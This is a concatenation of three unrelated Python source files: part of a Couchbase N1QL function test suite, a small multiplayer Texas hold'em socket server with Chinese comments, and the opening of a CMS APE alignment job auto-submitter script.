self._verify_results(actual_result, expected_result)
# This test has no usages anywhere
def test_acos(self):
self.query = "select degrees(acos(0.5))"
actual_list = self.run_cbq_query()
expected_result = [{'$1': 60}]
self._verify_results(actual_list['results'], expected_result)
# Test has no usages anywhere
def test_asin(self):
self.query = "select degrees(asin(0.5))"
actual_list = self.run_cbq_query()
expected_result = [{'$1': 30}]
self._verify_results(actual_list['results'], expected_result)
# Test has no usages anywhere
def test_tan(self):
self.query = "select tan(radians(45))"
actual_list = self.run_cbq_query()
expected_result = [{'$1': 1}]
self._verify_results(actual_list['results'], expected_result)
# This test has no usages anywhere
def test_ln(self):
self.query = "select ln(10) = ln(2) + ln(5)"
actual_list = self.run_cbq_query()
expected_result = [{'$1': True}]
self._verify_results(actual_list['results'], expected_result)
# This test has no usages anywhere
def test_power(self):
self.query = "select power(sin(radians(33)), 2) + power(cos(radians(33)), 2)"
actual_list = self.run_cbq_query()
expected_result = [{'$1': 1}]
self._verify_results(actual_list['results'], expected_result)
# Test has no usages anywhere
def test_sqrt(self):
self.query = "select sqrt(9)"
actual_list = self.run_cbq_query()
expected_result = [{'$1': 3}]
self._verify_results(actual_list['results'], expected_result)
# This test has no uses anywhere
def test_sign(self):
self.query = "select sign(-5)"
actual_list = self.run_cbq_query()
expected_result = [{'$1': -1}]
self._verify_results(actual_list['results'], expected_result)
self.query = "select sign(5)"
actual_list = self.run_cbq_query()
expected_result = [{'$1': 1}]
self._verify_results(actual_list['results'], expected_result)
self.query = "select sign(0)"
actual_list = self.run_cbq_query()
expected_result = [{'$1': 0}]
self._verify_results(actual_list['results'], expected_result)
##############################################################################################
#
# CONDITIONAL FNS
##############################################################################################
def test_nanif(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select join_day, join_mo, NANIF(join_day, join_mo) as equality" + \
" from %s" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"join_day": doc["join_day"], "join_mo": doc["join_mo"],
"equality": doc["join_day"] if doc["join_day"] != doc["join_mo"] else 'NaN'}
for doc in self.full_list]
self._verify_results(actual_result, expected_result)
def test_posinf(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select join_day, join_mo, POSINFIF(join_day, join_mo) as equality" + \
" from %s" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"join_day": doc["join_day"], "join_mo": doc["join_mo"],
"equality": doc["join_day"] if doc["join_day"] != doc["join_mo"] else '+Infinity'}
for doc in self.full_list]
self._verify_results(actual_result, expected_result)
##############################################################################################
#
# String FUNCTIONS
##############################################################################################
def test_uuid(self):
self.query = "select uuid() as uuid"
actual_list = self.run_cbq_query()
self.assertTrue('uuid' in actual_list['results'][0] and actual_list['results'][0]['uuid'],
'UUid is not working')
def test_string_fn_negative(self):
queries_errors = {'select name from %s when contains(VMs, "Sale")': ('syntax error', 3000),
'select TITLE(test_rate) as OS from %s': ('syntax error', 3000),
'select REPEAT(name, -2) as name from %s': ('syntax error', 3000),
'select REPEAT(name, a) as name from %s': ('syntax error', 3000), }
self.negative_common_body(queries_errors)
def test_contains(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name from %s where contains(job_title, 'Sale')" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
self.query = "select name from %s where contains(reverse(job_title), reverse('Sale'))" % query_bucket
actual_list1 = self.run_cbq_query()
actual_result1 = actual_list1['results']
diffs = DeepDiff(actual_result, actual_result1, ignore_order=True)
if diffs:
self.assertTrue(False, diffs)
expected_result = [{"name": doc["name"]}
for doc in self.full_list
if doc['job_title'].find('Sale') != -1]
self._verify_results(actual_result, expected_result)
def test_initcap(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select INITCAP(VMs[0].os) as OS from %s" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"OS": (doc["VMs"][0]["os"][0].upper() + doc["VMs"][0]["os"][1:])}
for doc in self.full_list]
self._verify_results(actual_result, expected_result)
def test_title(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select TITLE(VMs[0].os) as OS from %s" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
self.query = "select TITLE(REVERSE(VMs[0].os)) as rev_os from %s" % query_bucket
actual_list1 = self.run_cbq_query()
actual_result1 = actual_list1['results']
expected_result = [{"OS": (doc["VMs"][0]["os"][0].upper() + doc["VMs"][0]["os"][1:])}
for doc in self.full_list]
expected_result1 = [{"rev_os": (doc["VMs"][0]["os"][::-1][0].upper() + doc["VMs"][0]["os"][::-1][1:])} for
doc in self.full_list]
self._verify_results(actual_result, expected_result)
self._verify_results(actual_result1, expected_result1)
def test_prepared_title(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select TITLE(VMs[0].os) as OS from %s" % query_bucket
self.prepared_common_body()
def test_position(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select POSITION(VMs[1].name, 'vm') pos from %s" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"pos": (doc["VMs"][1]["name"].find('vm'))} for doc in self.full_list]
self._verify_results(actual_result, expected_result)
self.query = "select POSITION(VMs[1].name, 'server') pos from %s" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"pos": (doc["VMs"][1]["name"].find('server'))}
for doc in self.full_list]
self._verify_results(actual_result, expected_result)
test_word = 'california'
for letter in test_word:
actual = self.run_position_query(test_word, letter)
expected = test_word.find(letter)
self.assertEqual(actual, expected)
letter = ''
actual = self.run_position_query(test_word, letter)
expected = test_word.find(letter)
self.assertEqual(actual, expected)
letter = 'd'
actual = self.run_position_query(test_word, letter)
expected = test_word.find(letter)
self.assertEqual(actual, expected)
def test_position0(self):
test_word = 'california'
for letter in test_word:
actual = self.run_position_query(test_word, letter, position_type='0')
expected = test_word.find(letter)
self.assertEqual(actual, expected)
letter = ''
actual = self.run_position_query(test_word, letter, position_type='0')
expected = test_word.find(letter)
self.assertEqual(actual, expected)
letter = 'd'
actual = self.run_position_query(test_word, letter, position_type='0')
expected = test_word.find(letter)
self.assertEqual(actual, expected)
def test_position1(self):
test_word = 'california'
for letter in test_word:
actual = self.run_position_query(test_word, letter, position_type='1')
expected = test_word.find(letter) + 1
self.assertEqual(actual, expected)
letter = ''
actual = self.run_position_query(test_word, letter, position_type='1')
expected = test_word.find(letter) + 1
self.assertEqual(actual, expected)
letter = 'd'
actual = self.run_position_query(test_word, letter, position_type='1')
expected = test_word.find(letter) + 1
self.assertEqual(actual, expected)
def test_regex_contains(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select email from %s where REGEXP_CONTAINS(email, '-m..l')" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
self.query = "select email from %s where REGEXP_CONTAINS(reverse(email), 'l..m-')" % query_bucket
actual_list1 = self.run_cbq_query()
actual_result1 = actual_list1['results']
diffs = DeepDiff(actual_result, actual_result1, ignore_order=True)
if diffs:
self.assertTrue(False, diffs)
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"email": doc["email"]}
for doc in self.full_list
if len(re.compile('-m..l').findall(doc['email'])) > 0]
self._verify_results(actual_result, expected_result)
def test_regex_like(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select email from %s where REGEXP_LIKE(email, '.*-mail.*')" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"email": doc["email"]}
for doc in self.full_list
if re.compile('.*-mail.*').search(doc['email'])]
self._verify_results(actual_result, expected_result)
def test_regex_position(self):
test_word = 'california'
for letter in test_word:
actual = self.run_regex_query(test_word, letter)
expected = test_word.find(letter)
self.assertEqual(actual, expected)
letter = ''
actual = self.run_regex_query(test_word, letter)
expected = test_word.find(letter)
self.assertEqual(actual, expected)
letter = 'd'
actual = self.run_regex_query(test_word, letter)
expected = test_word.find(letter)
self.assertEqual(actual, expected)
def test_regex_position0(self):
test_word = 'california'
for letter in test_word:
actual = self.run_regex_query(test_word, letter, regex_type='0')
expected = test_word.find(letter)
self.assertEqual(actual, expected)
letter = ''
actual = self.run_regex_query(test_word, letter, regex_type='0')
expected = test_word.find(letter)
self.assertEqual(actual, expected)
letter = 'd'
actual = self.run_regex_query(test_word, letter, regex_type='0')
expected = test_word.find(letter)
self.assertEqual(actual, expected)
def test_regex_position1(self):
test_word = 'california'
for letter in test_word:
actual = self.run_regex_query(test_word, letter, regex_type='1')
expected = test_word.find(letter) + 1
self.assertEqual(actual, expected)
letter = ''
actual = self.run_regex_query(test_word, letter, regex_type='1')
expected = test_word.find(letter) + 1
self.assertEqual(actual, expected)
letter = 'd'
actual = self.run_regex_query(test_word, letter, regex_type='1')
expected = test_word.find(letter)
self.assertEqual(actual, expected)
def test_regex_replace(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name, REGEXP_REPLACE(email, '-mail', 'domain') as mail from %s" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"],
"mail": doc["email"].replace('-mail', 'domain')}
for doc in self.full_list]
self._verify_results(actual_result, expected_result)
self.query = "select name, REGEXP_REPLACE(email, 'e', 'a', 2) as mail from %s" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"],
"mail": doc["email"].replace('e', 'a', 2)}
for doc in self.full_list]
self._verify_results(actual_result, expected_result)
def test_replace(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name, REPLACE(email, 'a', 'e', 1) as mail from %s" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"],
"mail": doc["email"].replace('a', 'e', 1)}
for doc in self.full_list]
self._verify_results(actual_result, expected_result)
def test_repeat(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select REPEAT(name, 2) as name from %s" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"] * 2}
for doc in self.full_list]
self._verify_results(actual_result, expected_result)
##############################################################################################
#
# LET
##############################################################################################
def test_let_nums(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select test_r, test_r > 2 compare from %s let test_r = (test_rate / 2)" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"test_r": doc["test_rate"] / 2,
"compare": (doc["test_rate"] / 2) > 2}
for doc in self.full_list]
self._verify_results(actual_result, expected_result)
def test_prepared_let_nums(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select test_r, test_r > 2 compare from %s let test_r = (test_rate / 2)" % query_bucket
self.prepared_common_body()
def test_let_string(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name, join_date as date from %s let join_date = tostr(join_yr) || '-' || tostr(" \
"join_mo)" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"],
"date": '%s-%s' % (doc['join_yr'], doc['join_mo'])}
for doc in self.full_list]
self._verify_results(actual_result, expected_result)
self.query = "select name, join_date as date from %s let join_date = reverse(tostr(join_yr)) || '-' || " \
"reverse(tostr(join_mo)) order by name, meta().id limit 10" % query_bucket
actual_list2 = self.run_cbq_query()
actual_result2 = actual_list2['results']
expected_result2 = [{'date': '1102-9', 'name': 'employee-1'}, {'date': '1102-9', 'name': 'employee-1'},
{'date': '1102-9', 'name': 'employee-1'}, {'date': '1102-9', 'name': 'employee-1'},
{'date': '1102-9', 'name': 'employee-1'}, {'date': '1102-9', 'name': 'employee-1'},
{'date': '0102-4', 'name': 'employee-1'}, {'date': '0102-4', 'name': 'employee-1'},
{'date': '0102-4', 'name': 'employee-1'}, {'date': '0102-4', 'name': 'employee-1'}]
self._verify_results(actual_result2, expected_result2)
def test_letting(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT join_mo, sum_test from %s WHERE join_mo>7 group by join_mo letting sum_test = sum(" \
"tasks_points.task1)" % query_bucket
if self.analytics:
self.query = "SELECT d.join_mo, sum_test from %s d WHERE d.join_mo>7 group by d.join_mo letting " \
"sum_test = sum(d.tasks_points.task1)" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
tmp_groups = {doc['join_mo'] for doc in self.full_list if doc['join_mo'] > 7}
expected_result = [{"join_mo": group,
"sum_test": sum([x["tasks_points"]["task1"] for x in self.full_list
if x["join_mo"] == group])}
for group in tmp_groups]
self._verify_results(actual_result, expected_result)
def test_prepared_letting(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT join_mo, sum_test from %s WHERE join_mo>7 group by join_mo letting sum_test = sum(" \
"tasks_points.task1)" % query_bucket
self.prepared_common_body()
# https://issues.couchbase.com/browse/MB-26086
def check_special_symbols(self):
self.fail_if_no_buckets()
symbols = ['~', '!', '@', '#', '$', '%', '^', '&', '*', '(', ')', '_', '-', '+', '=', '{', '[', '}', ']', '|',
'.', ':', ';', '"', '<', ',', '>', '.', '?', '/']
errors_simple = {}
errors_complex = {}
query = "INSERT INTO " + self.query_buckets[0] + " VALUES ('simple', {"
for i in range(len(symbols)):
query += "'a" + symbols[i] + "b':1"
if i < len(symbols) - 1:
query += ","
query += "})"
self.run_cbq_query(query)
for i in range(len(symbols)):
query = "SELECT `a" + symbols[i] + "b` FROM " + self.query_buckets[0] + " USE KEYS ['simple'] WHERE `a" + \
symbols[i] + "b` IS NOT MISSING"
result = self.run_cbq_query(query)
if result['metrics']['resultCount'] < 1:
errors_simple[symbols[i]] = query
# Assuming I have only 3 special characters: ~!@ the resulting query will be like
# INSERT INTO default VALUES ('complex', {'a~b':{'a~b':12, 'a!b':12, 'a@b':12},
# 'a!b':{'a~b':12, 'a!b':12, 'a@b':12},
# 'a@b':{'a~b':12, 'a!b':12, 'a@b':12 }})
query = "INSERT INTO " + self.query_buckets[0] + " VALUES ('complex', {"
for i in range(len(symbols)):
query += "'a" + symbols[i] + "b':{"
for j in range(len(symbols)):
query += "'a" + symbols[j] + "b':12"
if j < len(symbols) - 1:
query += ","
else:
query += "}"
if i < len(symbols) - 1:
query += ","
query += "})"
self.run_cbq_query(query)
for i in range(len(symbols)):
for j in range(len(symbols)):
query = "SELECT `a" + symbols[i] + "b`.`a" + symbols[j] + \
"b` FROM " + self.query_buckets[0] + " USE KEYS ['complex'] WHERE `a" + symbols[i] + \
"b`.`a" + symbols[j] + "b` IS NOT MISSING"
result = self.run_cbq_query(query)
if result['metrics']['resultCount'] < 1:
errors_complex[str(symbols[i]) + str(symbols[j])] = query
self.assertEqual(len(errors_simple) + len(errors_complex), 0)
|
server.py
|
import sys
print(sys.path[0])
sys.path.append(sys.path[0] + '/../..')
import socketserver
import threading
from time import sleep
from NetworkVersion.Server.protocal import Protocol
from NetworkVersion.game_manager import GameManager
from NetworkVersion.utils import Action, Player_State
g_conn_pool = [] # 连接池
ready_num = 0 # TODO: 记得清零
gm = None
LEAST_PLAYER_NUM = 2
INIT_POSSESS = 10000
BASE_CHIP = 100
class Conn:
def __init__(self, conn):
self.conn = conn
self.name = None
self.id = -1
self.is_ready = False
def init_client_players():
# gm刚建立时,要每个client初始化一个player_num大小的PlayerPublicInfo列表
# 还要告诉client他们自己的id是多少
player_num = len(g_conn_pool)
for r in g_conn_pool:
ret = Protocol()
ret.add_str("init_players")
ret.add_int32(player_num)
ret.add_int32(r.id)
for k in g_conn_pool:
ret.add_str(k.name)
r.conn.sendall(ret.get_pck_has_head())
def refresh_player_public_info():
global gm
# TODO:把player的公开信息发送给client,每个client通过id判断哪个是自己
# TODO:可以优化成只更新指定pid的人的信息
ret = Protocol()
# 要发送的信息是一个列表[(pid, possess, cur_bet, current_state)]
ret.add_str("public_info")
num = len(g_conn_pool)
ret.add_int32(num)
for r in g_conn_pool:
pid = r.id
public_info = gm.get_public_info_by_pid(pid)
ret.add_int32(pid)
ret.add_int32(public_info[0])
ret.add_int32(public_info[1])
ret.add_int32(public_info[2].value)
for r in g_conn_pool:
r.conn.sendall(ret.get_pck_has_head())
def refresh_player_private_info(pidx):
global gm
# TODO:向指定id的client发送私密信息(card)
for r in g_conn_pool:
if r.id == pidx:
ret = Protocol()
ret.add_str("private_info")
str_cards = " ".join(gm.get_player_card_by_pid(pidx))
ret.add_str(str_cards)
r.conn.sendall(ret.get_pck_has_head())
break
def refresh_player_open_card():
global gm
ret = Protocol()
ret.add_str("open_card")
ret.add_int32(gm.env.current_left_player_num)
for r in g_conn_pool:
pid = r.id
if gm.players[pid].current_state not in [Player_State.FOLD, Player_State.OUT]:
ret.add_int32(pid)
ret.add_str(" ".join(gm.get_player_card_by_pid(pid)))
ret.add_str(gm.players[pid].current_chosen_card_info.best_card_type +
' '+' '.join([card.rank for card in gm.players[pid].current_chosen_card_info.best_card]))
for r in g_conn_pool:
r.conn.sendall(ret.get_pck_has_head())
def refresh_env_info():
global gm
# 向所有人发送env信息:公共牌、最大下注、大盲位置啥的
public_card, pool_possess, BB_id, current_max_bet, current_left_player_num = gm.get_env_info()
str_public_card = " ".join(public_card)
ret = Protocol()
ret.add_str("env_info")
ret.add_str(str_public_card)
ret.add_int32(pool_possess)
ret.add_int32(BB_id)
ret.add_int32(current_max_bet)
ret.add_int32(current_left_player_num)
for r in g_conn_pool:
r.conn.sendall(ret.get_pck_has_head())
def game_start():
ret = Protocol()
ret.add_str("game_start")
for r in g_conn_pool:
r.conn.sendall(ret.get_pck_has_head())
def game_over():
ret = Protocol()
ret.add_str("game_over")
# TODO 清理准备状态等 / print info
global ready_num
# ready_num = 0
ready_num = len(g_conn_pool) - gm.alive_player_num
for r in g_conn_pool:
r.is_ready = False
r.conn.sendall(ret.get_pck_has_head())
def play_a_game():
# 把GameManager的play_a_game移到这里来实现,方便穿插向client发消息,以及判断游戏状态
global gm
# 返回一局的赢家,-1表示人数不足了,游戏结束
# 开始前默认确定好大小盲位置,且场上玩家大于两位
if gm.alive_player_num < 2:
return -1
gm.poker.reset_card()
# TODO: 开局即allin
gm.init_env(gm.BB_pos, len(gm.alive_player_id))
# 下盲注
gm.env.pool_possess += gm.players[gm.alive_player_id[gm.BB_pos]].bet(2 * gm.base_chip)
gm.env.pool_possess += gm.players[gm.alive_player_id[gm.SB_pos]].bet(gm.base_chip)
# 更新玩家信息和环境信息
refresh_env_info()
refresh_player_public_info()
# 开始发两张底牌
for pidx in gm.alive_player_id:
gm.players[pidx].card += gm.poker.deal(2)
refresh_player_private_info(pidx)
gm.update_env()
# self.print_info(current_player_idx)
# 第一轮下注
if not gm.a_round_of_bet(g_conn_pool):
return
# 发三张公共牌
gm.env.public_cards += gm.poker.deal(3)
gm.update_env()
refresh_env_info()
# 第二轮下注
if not gm.a_round_of_bet(g_conn_pool):
return
# 发一张公共牌
gm.env.public_cards += gm.poker.deal(1)
gm.update_env()
refresh_env_info()
# 第三轮下注
if not gm.a_round_of_bet(g_conn_pool):
return
# 发一张公共牌
gm.env.public_cards += gm.poker.deal(1)
gm.update_env()
refresh_env_info()
# 最后一轮下注
if not gm.a_round_of_bet(g_conn_pool):
return
# 开牌比大小,分赃
gm.compare_card() # gm alive可能会变,BBpos会变
refresh_player_open_card()
gm.end_match()
# 还可能下一局虽然人数够(3个),但是alive < 2了
# 更新玩家信息和环境信息
refresh_env_info()
refresh_player_public_info()
def a_game_process(log_file='info.log'):
game_start()
with open(log_file, 'a+') as f:
f.write('*'*30)
play_a_game()
with open(log_file, 'a+') as f:
f.write('*'*30)
f.write('\n')
game_over()
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
def setup(self):
self.request.sendall("连接服务器成功!".encode(encoding='utf8'))
# 加入连接池
conn = Conn(self.request)
g_conn_pool.append(conn)
def handle(self):
while True:
try:
# 读取数据包
bytes = self.request.recv(1024)
# 切割数据包
while True:
# 读取包长度
length_pck = int.from_bytes(bytes[:4], byteorder='little')
# 截取封包
pck = bytes[4:4 + length_pck]
# 删除已经读取的字节
bytes = bytes[4 + length_pck:]
# 把封包交给处理函数
self.pck_handler(pck)
# 如果bytes没数据了,就跳出循环
if len(bytes) == 0:
break
# print("客户端消息:", bytes.decode(encoding="utf8"))
except Exception as e: # 意外掉线
print("---------------------------")
print("玩家:【%s】掉线啦。" % self.get_conn().name)
self.remove()
global ready_num, gm, g_conn_pool
if len(g_conn_pool) == 0:
print('所有玩家已离开,重置!')
ready_num = 0
gm = None
g_conn_pool = [] # 内存会泄露吗,python应该会自己清理
break
def finish(self):
pass
def get_conn(self):
for conn in g_conn_pool:
if conn.conn == self.request:
return conn
def pck_handler(self, pck):
"""
解析数据包
"""
p = Protocol(pck)
pck_type = p.get_str()
# print('getting package %s...' % pck_type)
global ready_num, gm, g_conn_pool
if pck_type == 'register':
name = p.get_str()
self.get_conn().name = name
print(name, ' register')
elif pck_type == 'ready' and not self.get_conn().is_ready:
print(self.get_conn().name, ' get ready')
self.get_conn().is_ready = True
ready_num += 1
if len(g_conn_pool) >= LEAST_PLAYER_NUM and len(g_conn_pool) == ready_num:
# 最后一个按准备的人,对应的线程有点房主的意思
# 游戏开始
if gm is None:
# 如果是第一次开始游戏,先初始化牌桌的游戏管理器
gm = GameManager(player_num=ready_num, init_possess=INIT_POSSESS, base_chip=BASE_CHIP)
# 为每个玩家分配id(按顺序就行)
for i, conn in enumerate(g_conn_pool):
conn.id = i
init_client_players()
else:
# TODO: 如果前面已经玩过游戏了,开始第k局怎么办?要不要清理玩家,重置状态,检查在不在线,有新加入玩家啊什么的
pass
# 不行,开始不了
game = threading.Thread(target=a_game_process)
game.daemon = True
game.start()
elif pck_type == 'action':
pid = self.get_conn().id
action_type = p.get_int32()
money = p.get_int32()
# print('get_action: pid=%d, type=%d, money=%d'%(pid, action_type, money))
no2action = {1: 'FOLD', 2: 'CHECK_OR_CALL', 3: 'CALL_AND_RAISE'}
action = Action(no2action[action_type], money)
# 设置gm的对应玩家采取的action
gm.player_actions[pid] = action
gm.player_action_flag[pid] = True
elif pck_type == '#ilhth restart' and ready_num == 0:
# 神秘命令,当有人没钱的时候可以重开, 这样就不用每次都重新打开游戏了
gm = None
elif pck_type == '#ilhth clear':
# 神秘命令,清场,这样服务器就可以一直挂着,不用每次都要去启动服务器了
ready_num = 0
gm = None
g_conn_pool = [] # 内存会泄露吗,python应该会自己清理
def remove(self):
# # 告诉各个客户端有玩家离线
# ret = Protocol()
# ret.add_str("logout")
# ret.add_str(self.get_conn().name)
# for r in g_conn_pool:
# if r != self.get_conn():
# r.conn.sendall(ret.get_pck_has_head())
g_conn_pool.remove(self.get_conn())
pass
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--port', '-p', type=int, default=23456, help='端口号')
parser.add_argument('--init_chip', '-ic', type=int, default=10000, help='初始筹码')
parser.add_argument('--base_chip', '-bc', type=int, default=100, help='最低下注筹码')
parser.add_argument('--least_player_num', '-lpn', type=int, default=2, help='至少玩家数')
args = parser.parse_args()
port = args.port
INIT_POSSESS = args.init_chip
BASE_CHIP = args.base_chip
LEAST_PLAYER_NUM = args.least_player_num
ip = input('输入服务器ip(直接回车使用默认):')
if ip == '':
ip = '192.168.1.110'
ADDRESS = (ip, port) # 绑定地址
# ADDRESS = ('127.0.0.1', port) # 绑定地址
server = ThreadedTCPServer(ADDRESS, ThreadedTCPRequestHandler)
# 新开一个线程运行服务端
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = False
server_thread.start()
# 主线程逻辑
while True:
sleep(3)
# linux下后台运行不能使用input
# cmd = input("""--------------------------
# # 输入1:查看当前在线人数
# # 输入2:关闭服务端
# # """)
# if cmd == '1':
# print("--------------------------")
# print("当前在线人数:", len(g_conn_pool))
# elif cmd == '2':
# server.shutdown()
# server.server_close()
# exit()
|
autoSubmitter.py
|
from __future__ import print_function
import configparser as ConfigParser
import argparse
import shelve
import sys
import os
import subprocess
import threading
import shutil
import time
import re
from helpers import *
shelve_name = "dump.shelve" # contains all the measurement objects
history_file = "history.log"
clock_interval = 20 # in seconds
delete_logs_after_finish = False # if it is not desired to keep the log and submit script files
use_caf = False
def save(name, object):
# in case of multiple threads running this stops potentially problematic file access
global lock
lock.acquire()
try:
sh = shelve.open(shelve_name)
sh[name] = object
sh.close()
finally:
lock.release()
class Dataset:
name = ""
nFiles = 0
maxEvents = -1
baseDirectory = ""
sampleType = "data1"
fileList = []
conditions = []
def __init__(self, config, name):
dsDict = dict(config.items("dataset:{}".format(name)))
self.name = name
self.baseDirectory = dsDict["baseDirectory"]
self.fileList = []
names = dsDict["fileNames"].split(" ")
for name in names:
parsedNames = replaceAllRanges(name)
for fileName in parsedNames:
self.fileList.append(self.baseDirectory+"/"+fileName)
self.nFiles = len(self.fileList)
if "maxEvents" in dsDict:
self.maxEvents = int(dsDict["maxEvents"])
if "isMC" in dsDict:
if dsDict["isMC"] == "True":
self.sampleType = "MC"
else:
self.sampleType ="data1"
self.conditions, dummy, self.validConditions = loadConditions(dsDict)
# check if any of the sources used for conditions is invalid
if not self.validConditions:
print("Invalid conditions defined for dataset {}".format(self.name))
# check if all files specified exist
self.existingFiles, missingFiles = allFilesExist(self)
if not self.existingFiles:
for fileName in missingFiles:
print("Invalid file name {} defined for dataset {}".format(fileName, self.name))
class Alignment:
name = ""
alignmentName = None
baselineDir = "Design"
globalTag = "None"
isDesign = False
hasAlignmentCondition = False
conditions = []
def __init__(self, config, name):
alDict = dict(config.items("alignment:{}".format(name)))
self.name = name
if "alignmentName" in alDict:
self.alignmentName = alDict["alignmentName"]
if "globalTag" in alDict:
self.globalTag = alDict["globalTag"]
if "baselineDir" in alDict:
self.baselineDir= alDict["baselineDir"]
if "isDesign" in alDict:
self.isDesign= (alDict["isDesign"] == "True")
# If self.hasAlignmentCondition is true, no other Alignment-Object is loaded in apeEstimator_cfg.py using the alignmentName
self.conditions, self.hasAlignmentCondition, self.validConditions = loadConditions(alDict)
# check if any of the sources used for conditions is invalid
if not self.validConditions:
print("Invalid conditions defined for alignment {}".format(self.name))
# check if at least one of the two ways to define the alignment was used
if self.alignmentName == None and not self.hasAlignmentCondition:
print("Error: No alignment object name or record was defined for alignment {}".format(self.name))
sys.exit()
class ApeMeasurement:
name = "workingArea"
curIteration = 0
firstIteration = 0
maxIterations = 15
maxEvents = None
status = STATE_NONE
dataset = None
alignment = None
runningJobs = None
failedJobs = None
startTime = ""
finishTime = ""
def __init__(self, name, config, settings):
self.name = name
self.status = STATE_ITERATION_START
self.runningJobs = []
self.failedJobs = []
self.startTime = subprocess.check_output(["date"]).strip()
# load conditions from dictionary, overwrite defaults if defined
for key, value in settings.items():
if not key.startswith("condition "):
setattr(self, key, value)
# Replace names with actual Dataset and Alignment objects
# In principle, one could preload all these once so they are not
# redefined for each measurement, but right now this does not
# seem necessary
self.dataset = Dataset(config, settings["dataset"])
self.alignment = Alignment(config, settings["alignment"])
# If not defined here, replace by setting from Dataset
if not "maxEvents" in settings:
self.maxEvents = self.dataset.maxEvents
self.firstIteration=int(self.firstIteration)
self.maxIterations=int(self.maxIterations)
self.curIteration = self.firstIteration
self.maxEvents = int(self.maxEvents)
if self.alignment.isDesign:
self.maxIterations = 0
self.conditions, dummy, self.validConditions = loadConditions(settings)
# see if sanity checks passed
if not self.alignment.validConditions or not self.dataset.validConditions or not self.dataset.existingFiles or not self.validConditions:
self.status = STATE_INVALID_CONDITIONS
self.print_status()
self.finishTime = subprocess.check_output(["date"]).strip()
return
if self.alignment.isDesign and self.dataset.sampleType != "MC":
# For now, this won't immediately shut down the program
print("APE Measurement {} is scheduled to to an APE baseline measurement with a dataset that is not marked as isMC=True. Is this intended?".format(self.name))
ensurePathExists('{}/hists/{}'.format(base, self.name))
if not self.alignment.isDesign:
ensurePathExists('{}/hists/{}/apeObjects'.format(base, self.name))
def get_status(self):
return status_map[self.status]
def print_status(self):
print("APE Measurement {} in iteration {} is now in status {}".format(self.name, self.curIteration, self.get_status()))
# submit jobs for track refit and hit categorization
def submit_jobs(self):
toSubmit = []
allConditions = self.alignment.conditions+self.dataset.conditions+self.conditions
allConditions = list({v['record']:v for v in allConditions}.values()) # should we clean for duplicate records? the record last defined (from dataset)
# will be kept in case of overlap, which is the same as if there was no overlap removal
ensurePathExists("{}/test/autoSubmitter/workingArea".format(base))
# If conditions are made, create file to load them from
rawFileName = "None"
conditionsFileName = "None"
if len(allConditions) > 0:
conditionsFileName = "{base}/python/conditions/conditions_{name}_iter{iterNo}_cff.py".format(base=base,name=self.name, iterNo=self.curIteration)
rawFileName = "conditions_{name}_iter{iterNo}_cff".format(name=self.name, iterNo=self.curIteration)
with open(conditionsFileName, "w") as fi:
from autoSubmitterTemplates import conditionsFileHeader
fi.write(conditionsFileHeader)
from autoSubmitterTemplates import conditionsTemplate
for condition in allConditions:
fi.write(conditionsTemplate.format(record=condition["record"], connect=condition["connect"], tag=condition["tag"]))
alignmentNameToUse = self.alignment.alignmentName
if self.alignment.hasAlignmentCondition:
alignmentNameToUse = "fromConditions"
lastIter = (self.curIteration==self.maxIterations) and not self.alignment.isDesign
inputCommands = "sample={sample} fileNumber={fileNo} iterNumber={iterNo} lastIter={lastIter} alignRcd={alignRcd} maxEvents={maxEvents} globalTag={globalTag} measurementName={name} conditions={conditions}".format(sample=self.dataset.sampleType,fileNo="$1",iterNo=self.curIteration,lastIter=lastIter,alignRcd=alignmentNameToUse, maxEvents=self.maxEvents, globalTag=self.alignment.globalTag, name=self.name, conditions=rawFileName)
